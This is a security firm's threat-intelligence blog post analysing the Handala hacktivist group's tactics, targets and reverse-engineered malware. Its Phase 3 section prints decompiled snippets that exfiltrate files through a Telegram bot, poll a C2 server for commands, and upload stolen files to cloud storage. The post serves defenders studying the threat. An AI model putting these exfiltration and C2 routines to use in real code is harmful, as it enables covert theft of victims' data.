Open Nav
Sign Up

Unpacking Handala – Evolution of a Cyberthreat

Matan Matalon

February 18, 2025

For over a year, Handala has been relentlessly targeting the Israeli sector, evolving from a disruptive nuisance to a formidable cyber threat. What started as unsophisticated phishing campaigns and DDoS attacks has now escalated into a full-fledged offensive against critical infrastructure. But what exactly changed?

In this first-of-its-kind research, we reveal how Handala has transformed from a hacktivist group into an aspiring nation-state-level adversary, leveraging advanced tactics, stolen credentials, and covert data exfiltration techniques. With the help of our in-house AI-powered analysis tools, we dissect their malware, uncover hidden operational patterns, and reverse-engineer their attack framework.

For the first time, we reveal their evolving tactics, the technologies fueling their operations, and their methods for siphoning sensitive data to cloud storage and Telegram.

This isn’t just another cyber threat-it’s a turning point.

And trust us, there’s a lot to unpack…

Why OP Innovate Conducted This Research

At OP Innovate, we pride ourselves on delivering top-tier incident response (IR) services, and over the past several months, we’ve been on the front lines of multiple Handala-related investigations. Time and time again, we’ve seen the same pattern-organizations blindsided by an attacker that was evolving faster than most defenders could react.

Through these real-world incidents, we uncovered a wealth of Indicators of Compromise (IOCs)-intel that wasn’t publicly available anywhere else. And that’s when the idea struck: What if we took the time to dig deeper? By reverse-engineering the traces Handala left behind and following the breadcrumbs, we could piece together their evolving playbook. More importantly, we can use these insights to arm future victims with the knowledge to detect, disrupt, and defend against these attacks before their data is compromised.

This research isn’t just about understanding Handala-it’s about staying one step ahead.

Handala 2.0: From Keyboard Warriors to Cyber Militants

Over the past six months, Handala has evolved from a disruptive hacktivist collective into a structured cyber threat actor, adopting nation-state-level tactics and expanding its target selection from random disruptions to calculated attacks on critical infrastructure. This transition reflects a shift from cyber vandalism to organized cyber warfare, with a growing focus on stealth, persistence, and large-scale data exfiltration.

Tactics: From Defacements to Strategic Infiltration

  • Credential-Based Attacks:
    Handala has moved away from simplistic DDoS attacks and defacements, instead exploiting stolen credentials from dark web marketplaces. By targeting organizations that do not enforce multi-factor authentication (MFA), they gain stealthy, long-term access without triggering security alerts.
  • Privilege Escalation & Backdoors:
    Once inside a network, Handala rapidly escalates privileges, often creating backdoor accounts to maintain access even if the initial entry point is patched. This persistence allows them to return to compromised networks at will.
  • Cloud-Based Exfiltration:
    Rather than relying on direct data transfers, Handala stores exfiltrated data in legitimate cloud services like Storj and Vultr, making their operations harder to detect and disrupt.
  • Multi-Channel C2 & Evasion Techniques:
    Handala’s malware blends into normal network traffic by communicating over Telegram’s encrypted API, HTTP-based C2 servers, and cloud APIs, making detection challenging.

Target Selection: From Random Disruptions to High-Value Supply Chain Attacks

  • Early Targets:
    • Small businesses and media outlets.
    • Public-facing websites, often attacked for maximum visibility rather than operational impact.
  • Recent Targets:
    • Supply Chain Vendors – Instead of attacking individual organizations directly, Handala breaches IT and cloud service providers to gain access to multiple downstream victims.
    • Critical Infrastructure – The group has increasingly targeted companies providing essential services, with a focus on IT management, cloud services, and engineering firms.

Some of their most recent confirmed breaches include:

  • ReutOne (CRM Provider) – This breach also allowed indirect access to Allen Carr’s Easyway, a well-known addiction treatment institution.
  • Zuk Group (Construction & Engineering Firm) – A multinational financial and technology conglomerate.

These attacks indicate a deliberate shift towards infiltrating service providers-a hallmark of sophisticated, long-term cyber campaigns aimed at gaining access to entire industries rather than single entities.

Unpacking Handala: Tracing the Trail of Stolen Data

Using forensic evidence from multiple breach sites, we conducted a deep dive into Handala’s malware infrastructure, exfiltration techniques, and operational persistence mechanisms. Our findings confirm that Handala is not just breaching networks but systematically organizing and distributing stolen intelligence to secure locations.

Phase 1: Extracting and Analyzing the Malware

1. Cracking Open senvarservice-DC.exe

One of the first major discoveries in our investigation was a Windows executable (senvarservice-DC.exe), which turned out to be a PyInstaller-packed Python script masquerading as a legitimate application.

By unpacking the executable, we found:

  • Amazon botocore references, suggesting AWS S3 was being used for data exfiltration.
  • PyQt5 dependencies, indicating a GUI component that could be used for disguise.

2. Automating Reverse Engineering with LISA

Using LISA (Layered Inspection & Structural Analysis)-our AI-powered reverse engineering tool – we were able to:

  • Disassemble the binary and extract its structure.
  • Decompile the Python code hidden within.
  • Detect Indicators of Compromise (IOCs).

With LISA, we accelerated the unpacking process, allowing us to focus on analyzing Handala’s malware behavior rather than just its packaging.

Phase 2: Breaking Down the Code

Once the internal Python scripts were extracted, we needed to decompile them. However, the malware was written in Python 3.12, making traditional decompilers like uncompyle6 and pycdc ineffective.

Automating the Decompilation Process

To handle this, we built a custom automation script that:

  • Uploaded .pyc files to Pylingual.io for decompilation.
  • Fetched results and saved readable Python scripts.
  • Allowed bulk processing, significantly reducing manual workload.

Once the code was fully decompiled, we moved to Phase 3: Understanding Handala’s Attack Framework.

Phase 3: Understanding Handala’s Cyber Toolkit

1. Telegram API for Data Exfiltration

The malware automates data exfiltration via Telegram bots, making it harder to detect.

def send_document(bot_token, chat_id, file_path):
    url = f"https://api.telegram.org/bot{bot_token}/sendDocument"
    files = {"document": open(file_path, 'rb')}
    payload = {"chat_id": chat_id}
    response = requests.post(url, files=files, data=payload)
    return response.status_code

The malware periodically checks its hardcoded HTTP C2 server for commands.

def fetch_c2_command():
    try:
        response = requests.get(f"{server_url}/command")
        if response.status_code == 200:
            return response.json()
    except Exception as e:
        log_error(f"Error fetching commands: {str(e)}")
    return None

3. Cloud-Based Storage for Stolen Data

The malware uploads stolen files to Storj cloud storage for long-term retention.

def upload_to_s3(file_path):
    session = boto3.Session(aws_access_key_id=S3_access_key, aws_secret_access_key=S3_secret_key)
    s3 = session.resource('s3')
    bucket = s3.Bucket('handala-bucket')
    bucket.upload_file(file_path, os.path.basename(file_path))

Final Observations: The Future of Handala’s Cyber Operations

  • Stealth & Persistence: Handala’s use of multi-channel exfiltration and modular malware design allows for long-term infiltration.
  • Adaptive Strategy: Attackers can switch C2 infrastructure, encryption methods, and targets in real-time.
  • Supply Chain Targeting: By compromising IT vendors, Handala can expand its reach beyond a single victim.

Understanding these tactics is critical for cybersecurity teams, as Handala continues to refine its strategy against high-value organizations.

Resources highlights

CVE-2025-55177: WhatsApp Authorization Flaw Exploited in Zero-Click Spyware Chain

WhatsApp has patched CVE-2025-55177, an authorization flaw in its linked-device synchronization feature that was exploited in the wild.  While Meta originally rated it medium severity,…

Read more >

CVE-2025-55177

Docker Issues Patch for Critical Exploit in Docker Desktop: CVE-2025-9074

On August 20, 2025, Docker released an urgent patch for CVE-2025-9074, a critical Server-Side Request Forgery (SSRF) vulnerability (CVSS 9.3) affecting Docker Desktop for Windows…

Read more >

CVE-2025-9074

CVE-2025-48384: Git Submodule Path Flaw Exploited in the Wild

CVE-2025-48384 is a client-side Git vulnerability that lets a malicious repository abuse a mismatch in how Git reads vs. writes configuration values containing a trailing…

Read more >

CVE-2025-48384

CVE-2025-43300: Apple ImageIO Zero-Day Exploited in Targeted Attacks

Apple patched CVE-2025-43300, a zero-day in the ImageIO framework used system-wide to read/write many image formats. Opening or previewing a malicious image can corrupt memory…

Read more >

CVE-2025-43300

CVE-2025-57790: Commvault Path Traversal Vulnerability Leads to RCE

On August 19th, Commvault published advisory CV_2025_08_2 for a newly-discovered path traversal flaw in the Web Server component that allows remote attackers to perform unauthorized…

Read more >

CVE-2025-57790

CVE-2025-20265: Cisco Secure Firewall Management Center (FMC) RADIUS Pre-Auth RCE

A critical (CVSS 10.0)  input-handling flaw in the RADIUS authentication subsystem of Cisco Secure Firewall Management Center (FMC), tracked as CVE-2025-20265 allows unauthenticated remote code…

Read more >

CVE-2025-20265
Under Cyber Attack?

Fill out the form and we will contact you immediately.